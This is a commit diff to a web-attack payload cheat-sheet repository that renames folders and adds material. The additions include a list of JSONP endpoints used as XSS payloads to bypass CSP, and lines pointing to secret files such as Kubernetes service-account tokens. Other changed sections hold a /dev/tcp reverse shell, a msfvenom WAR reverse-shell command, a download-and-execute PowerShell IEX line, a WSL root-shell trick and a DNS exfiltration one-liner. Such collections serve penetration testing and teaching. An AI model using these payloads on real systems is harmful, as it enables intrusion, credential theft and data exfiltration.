Architecture - Files/Intruder/Images and README + template
@ -10,4 +10,5 @@ wp-admin.php
|
||||
/include/mysql.php
|
||||
/inc/mysql.php
|
||||
/sites/defaults/settings.php
|
||||
/phpmyadmin/changelog.php
|
||||
/phpmyadmin/changelog.php
|
||||
web.config
|
@ -1,13 +1,16 @@
|
||||
# Local/Remote File Inclusion
|
||||
# File Inclusion - Path Traversal
|
||||
|
||||
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
|
||||
|
||||
The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application
|
||||
|
||||
## Summary
|
||||
|
||||
* [Path Traversal](#path-traversal)
|
||||
* [Basic LFI](#basic-lfi)
|
||||
* [Basic RFI](#basic-rfi)
|
||||
* [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
|
||||
* [Wrapper php://filter](l#wrapper-phpfilter)
|
||||
* [Wrapper php://filter](#wrapper-phpfilter)
|
||||
* [Wrapper zip://](#wrapper-zip)
|
||||
* [Wrapper data://](#wrapper-data)
|
||||
* [Wrapper expect://](#wrapper-expect)
|
||||
@ -21,6 +24,9 @@ The File Inclusion vulnerability allows an attacker to include a file, usually e
|
||||
* [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file)
|
||||
* [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions)
|
||||
|
||||
|
||||
## Path Traversal
|
||||
|
||||
Linux - Interesting files to check out :
|
||||
|
||||
```powershell
|
||||
@ -81,6 +87,13 @@ The following log files are controllable and can be included with an evil payloa
|
||||
/var/log/mail
|
||||
```
|
||||
|
||||
Other easy win files.
|
||||
|
||||
```powershell
|
||||
/home/$USER/.bash_history
|
||||
/var/run/secrets/kubernetes.io/serviceaccount
|
||||
```
|
||||
|
||||
## Basic LFI
|
||||
|
||||
```powershell
|
||||
|
@ -40,6 +40,8 @@ bettercap -X --proxy --proxy-https -T <target IP>
|
||||
|
||||
```powershell
|
||||
nmap -sn -n --disable-arp-ping 192.168.1.1-254 | grep -v "host down"
|
||||
-sn : Disable port scanning. Host discovery only.
|
||||
-n : Never do DNS resolution
|
||||
```
|
||||
|
||||
* Basic NMAP
|
||||
|
@ -114,6 +114,14 @@ p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while rea
|
||||
p.waitFor()
|
||||
```
|
||||
|
||||
### War
|
||||
|
||||
```java
|
||||
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
|
||||
strings reverse.war | grep jsp # in order to get the name of the file
|
||||
```
|
||||
|
||||
|
||||
### Lua
|
||||
|
||||
Linux only
|
||||
|
@ -1,7 +1,5 @@
|
||||
# Windows - Privilege Escalation
|
||||
|
||||
Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](https://addaxsoft.com/wpecs/)
|
||||
|
||||
## Windows Version and Configuration
|
||||
|
||||
```powershell
|
||||
@ -132,7 +130,7 @@ REG QUERY HKCU /F "password" /t REG_SZ /S /K
|
||||
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
|
||||
```
|
||||
|
||||
### Password in unattend.xml
|
||||
### Passwords in unattend.xml
|
||||
|
||||
Location of the unattend.xml files
|
||||
|
||||
@ -167,7 +165,7 @@ Example content
|
||||
|
||||
The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
|
||||
|
||||
## Processes Enum
|
||||
## Processes Enumeration
|
||||
|
||||
What processes are running?
|
||||
|
||||
@ -187,36 +185,32 @@ Do you have powershell magic?
|
||||
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
|
||||
```
|
||||
|
||||
## Uploading / Downloading files
|
||||
## Using PowerSploit's PowerUp
|
||||
|
||||
a wget using powershell
|
||||
|
||||
```powershell
|
||||
powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe"
|
||||
```
|
||||
|
||||
wget using bitsadmin (when powershell is not present)
|
||||
|
||||
```powershell
|
||||
cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe"
|
||||
```
|
||||
|
||||
now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat
|
||||
|
||||
```powershell
|
||||
%TEMP%\wget https://addaxsoft.com/download/wpecs/nc.exe
|
||||
```
|
||||
|
||||
## Spot the weak service using PowerSploit's PowerUP
|
||||
Spot the weak service using PowerSploit's PowerUp
|
||||
|
||||
```powershell
|
||||
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
|
||||
```
|
||||
|
||||
## Using Windows Subsystem for Linux (WSL)
|
||||
|
||||
Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032)
|
||||
|
||||
> With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ <distro>.exe --default-user root. Now start your bind shell or reverse.
|
||||
|
||||
```powershell
|
||||
wsl whoami
|
||||
./ubuntun1604.exe config --default-user root
|
||||
wsl whoami
|
||||
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
|
||||
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
|
||||
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
|
||||
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
|
||||
* [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
|
||||
* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
|
||||
* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
|
||||
* [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
|
0
Remote commands execution/Intruders/command_exec.txt → Remote commands execution/Intruder/command_exec.txt
Executable file → Normal file
@ -152,6 +152,10 @@ Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbi
|
||||
for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
|
||||
```
|
||||
|
||||
```powershell
|
||||
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
|
||||
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
|
||||
|
0
SQL injection/Intruders/Auth_Bypass2.txt → SQL injection/Intruder/Auth_Bypass2.txt
Executable file → Normal file
0
SQL injection/Intruders/Generic_ErrorBased.txt → SQL injection/Intruder/Generic_ErrorBased.txt
Executable file → Normal file
0
SQL injection/Intruders/Generic_UnionSelect.txt → SQL injection/Intruder/Generic_UnionSelect.txt
Executable file → Normal file
Before Width: | Height: | Size: 179 KiB After Width: | Height: | Size: 179 KiB |
Before Width: | Height: | Size: 381 KiB After Width: | Height: | Size: 381 KiB |
Before Width: | Height: | Size: 106 KiB After Width: | Height: | Size: 106 KiB |
@ -168,7 +168,7 @@ http://127.1.1.1:80:\@@127.2.2.2:80/
|
||||
http://127.1.1.1:80#\@127.2.2.2:80/
|
||||
```
|
||||
|
||||
![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/WeakParser.jpg)
|
||||
![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/WeakParser.jpg)
|
||||
|
||||
|
||||
## SSRF via URL Scheme
|
||||
|
Before Width: | Height: | Size: 44 KiB After Width: | Height: | Size: 44 KiB |
0
Server Side Template injections/Intruders/ssi_quick.txt → Server Side Template injections/Intruder/ssi_quick.txt
Executable file → Normal file
0
Tar commands execution/--checkpoint-action=exec=sh shell.sh → Tar commands execution/Files/--checkpoint-action=exec=sh shell.sh
Executable file → Normal file
0
Tar commands execution/--checkpoint=1 → Tar commands execution/Files/--checkpoint=1
Executable file → Normal file
0
Tar commands execution/shell.sh → Tar commands execution/Files/shell.sh
Executable file → Normal file
0
Traversal directory/deep_traversal.txt → Traversal directory/Intruder/deep_traversal.txt
Executable file → Normal file
0
Traversal directory/directory_traversal.txt → Traversal directory/Intruder/directory_traversal.txt
Executable file → Normal file
0
Traversal directory/dotdotpwn.txt → Traversal directory/Intruder/dotdotpwn.txt
Executable file → Normal file
54
XSS injection/Intruders/jsonp_endpoint.txt
Normal file
@ -0,0 +1,54 @@
|
||||
#Google.com:
|
||||
"><script+src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script>
|
||||
"><script+src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script>
|
||||
"><script+src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>
|
||||
"><script+src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>
|
||||
#Blogger.com:
|
||||
"><script+src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script>
|
||||
#Yandex:
|
||||
"><script+src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script>
|
||||
"><script+src="https://api-metrika.yandex.ru/management/v1/counter/1/operation/1?callback=alert"></script>
|
||||
#VK.com:
|
||||
"><script+src="https://api.vk.com/method/wall.get?callback=alert(1337)"></script>
|
||||
#Marketo.com
|
||||
"><script+src="http://app-sjint.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
|
||||
"><script+src="http://app-e.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
|
||||
#AlibabaGroup:
|
||||
"><script+src="https://detector.alicdn.com/2.7.3/index.php?callback=alert(1337)"></script>
|
||||
"><script+src="https://suggest.taobao.com/sug?callback=alert(1337)"></script>
|
||||
"><script+src="https://count.tbcdn.cn//counter3?callback=alert(1337)"></script>
|
||||
"><script+src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script>
|
||||
"><script+src="https://wb.amap.com/channel.php?callback=alert(1337)"></script>
|
||||
"><script+src="http://a.sm.cn/api/getgamehotboarddata?format=jsonp&page=1&_=1537365429621&callback=confirm(1);jsonp1"></script>
|
||||
"><script+src="http://api.m.sm.cn/rest?method=tools.sider&callback=jsonp_1869510867%3balert(1)%2f%2f794"></script>
|
||||
#Uber.com:
|
||||
"><script+src="https://mkto.uber.com/index.php/form/getKnownLead?callback=alert(document.domain);"></script>
|
||||
#AOL/Yahoo
|
||||
"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
|
||||
"><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3balert(1)%2f%2f476&_=1537149044679"></script>
|
||||
"><script+src="https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback=confirm(1);//jQuery20108887725116629929_1528071050373472232&_=1528071050374"></script>
|
||||
"><script+src="https://api.cmi.aol.com/catalog/cms/help-central-usaol-navigation-utility?callback=confirm(1);//jQuery20108887725116629929_152807105037740504&_=1528071050378"></script>
|
||||
"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
|
||||
"><script+src="https://ui.comet.aol.com/?module=header%7Cleftnav%7Cfooter&channel=finance&portfolios=true&domain=portfolios&collapsed=1&callback=confirm(9)//jQuery21307555521146732187_1538371213486&_=1538371213487"></script>
|
||||
"><script+src="http://portal.pf.aol.com/jsonmfus/?service=myportfolios,&porttype=1&portmax=100&callback=confirm(9)//jQuery1710788849030856973_1538354104695&_=1538354109053"></script>
|
||||
#Twitter.com:
|
||||
"><script+src="http://search.twitter.com/trends.json?callback=alert()"></script>
|
||||
"><script+src="https://twitter.com/statuses/user_timeline/yakumo119info.json?callback=confirm()"></script>
|
||||
"><script+src="https://twitter.com/status/user_timeline/kbeautysalon.json?count=1&callback=confirm()"></script>
|
||||
#Others:
|
||||
"><script+src="https://www.sharethis.com/get-publisher-info.php?callback=alert(1337)"></script>
|
||||
"><script+src="https://m.addthis.com/live/red_lojson/100eng.json?callback=alert(1337)"></script>
|
||||
"><script+src="https://passport.ngs.ru/ajax/check?callback=alert(1337)"></script>
|
||||
"><script+src="https://ulogin.ru/token.php?callback=alert(1337)"></script>
|
||||
"><script+src="https://www.meteoprog.ua/data/weather/informer/Poltava.js?callback=alert(1337)"></script>
|
||||
"><script+src="https://appcenter.intuit.com/Account/LogoutJSONP?callback=alert(1337)"></script>
|
||||
"><script+src="https://api.userlike.com/api/chat/slot/proactive/?callback=alert(1337)"></script>
|
||||
"><script+src="https://www.youku.com/index_cookielist/s/jsonp?callback=alert(1337)"></script>
|
||||
"><script+src="https://api.mixpanel.com/track/?callback=alert(1337)"></script>
|
||||
"><script+src="https://www.travelpayouts.com/widgets/50f53ce9ada1b54bcc000031.json?callback=alert(1337)"></script>
|
||||
"><script+src="http://ads.pictela.net/a/proxy/shoplocal/alllistings/d5dadac1578db80a/citystatezip=10008;pd=40B5B0493316E5A3D4A389374BC5ED3ED8C7AB99817408B4EF64205A5B936BC45155806F9BF419E853D2FCD810781C;promotioncode=Petco-140928;sortby=23;listingimageflag=y;listingimagewidth=300;resultset=full;listingcount=100;;callback=alert(1);/json"></script>
|
||||
"><script+src="https://adserver.adtechus.com/pubapi/3.0/9857.1/3792195/0/170/ADTECH;noperf=1;cmd=bid;bidfloor=0.12;callback=confirm(1);//window.proper_d31c1edc_57a8d6de_38"></script>
|
||||
#GoogleAPI's
|
||||
"><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//' allowscriptaccess=always>
|
||||
"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
|
||||
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
|
@ -778,6 +778,8 @@ Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.wi
|
||||
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
|
||||
```
|
||||
|
||||
More JSONP endpoints available in [/Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)
|
||||
|
||||
### Bypass CSP by [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa)
|
||||
|
||||
Works for CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`, [POC here](http://hsts.pro/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//bo0om.ru/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;)
|
||||
|
26
_template_vuln/README.md
Normal file
@ -0,0 +1,26 @@
|
||||
# Vulnerability Title
|
||||
|
||||
> Vulnerability description - reference
|
||||
|
||||
Tools:
|
||||
|
||||
- [Tool name - description](https://example.com)
|
||||
|
||||
## Summary
|
||||
|
||||
* [Something](#something)
|
||||
* [Something](#something)
|
||||
* [Subentry 1](#sub1)
|
||||
* [Subentry 2](#sub2)
|
||||
|
||||
## Something
|
||||
|
||||
Quick explanation
|
||||
|
||||
```powershell
|
||||
Exploit
|
||||
```
|
||||
|
||||
## Reference
|
||||
|
||||
- [Blog title - Author, Date](https://example.com)
|